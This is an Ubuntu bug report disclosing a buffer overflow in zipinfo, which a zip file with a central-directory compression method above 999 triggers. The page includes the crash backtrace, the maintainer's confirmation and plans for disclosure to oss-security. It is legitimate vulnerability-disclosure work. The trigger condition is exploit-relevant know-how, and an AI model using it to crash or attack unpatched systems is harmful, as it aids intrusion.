Buffer Overflow in ZipInfo
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
unzip (Ubuntu) |
Fix Released
|
Low
|
Unassigned |
Bug Description
Hello,
I am a security consultant and recently discovered this during some fuzzing exercises.
A buffer overflow occurs in zipinfo (part of the unzip package) when the compression method in the central directory file header is greater then 999;
user@lab:~$ lsb_release -rd
Description: Ubuntu 16.04.1 LTS
Release: 16.04
user@lab:~$ apt-cache policy unzip
unzip:
Installed: 6.0-20ubuntu1
Candidate: 6.0-20ubuntu1
Version table:
*** 6.0-20ubuntu1 500
500 http://
100 /var/lib/
Here is an example output:
user@lab:~$ zipinfo PoC.zip
Archive: PoC.zip
Zip file size: 154 bytes, number of entries: 1
*** buffer overflow detected ***: zipinfo terminated
======= Backtrace: =========
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
zipinfo[0x41729b]
zipinfo[0x41144a]
zipinfo[0x411bdf]
zipinfo[0x404191]
/lib/x86_
zipinfo[0x401fa9]
======= Memory map: ========
00400000-00427000 r-xp 00000000 08:01 9176785 /usr/bin/zipinfo
00626000-00627000 r--p 00026000 08:01 9176785 /usr/bin/zipinfo
00627000-00628000 rw-p 00027000 08:01 9176785 /usr/bin/zipinfo
00628000-0071a000 rw-p 00000000 00:00 0
0207b000-0209c000 rw-p 00000000 00:00 0 [heap]
7f7feda5b000-
7f7feda71000-
7f7fedc70000-
7f7fedc71000-
7f7fedf49000-
7f7fee108000-
7f7fee308000-
7f7fee30c000-
7f7fee30e000-
7f7fee312000-
7f7fee321000-
7f7fee520000-
7f7fee521000-
7f7fee522000-
7f7fee729000-
7f7fee744000-
7f7fee747000-
7f7fee748000-
7f7fee749000-
7fffad5d3000-
7fffad5f8000-
7fffad5fa000-
ffffffffff60000
I look forward to hearing from you,
Alexis
CVE References
Changed in unzip (Ubuntu): | |
importance: | Undecided → Low |
information type: | Private Security → Public Security |
Hi Alexis - Thanks for the bug report.
I can verify the issue that you have reported. After some research, I've determined it is very similar to but different than an older unzip -l crasher reported on oss-security:
http:// www.openwall. com/lists/ oss-security/ 2014/11/ 03/5
Your PoC also happens to trigger that issue in unzip -l but they crash in different areas of the unzip codebase.
Since there are a number of similar unzip issues that never received CVEs or fixes from around 11-2014, I plan to make this issue public and forward the report to the oss-security list early Monday (I'd prefer to avoid reporting an issue at the end of the day on a Friday).
I'd like to credit you for the issue. Would you mind sharing your first and last name so that I can include it in my email report? Thanks again!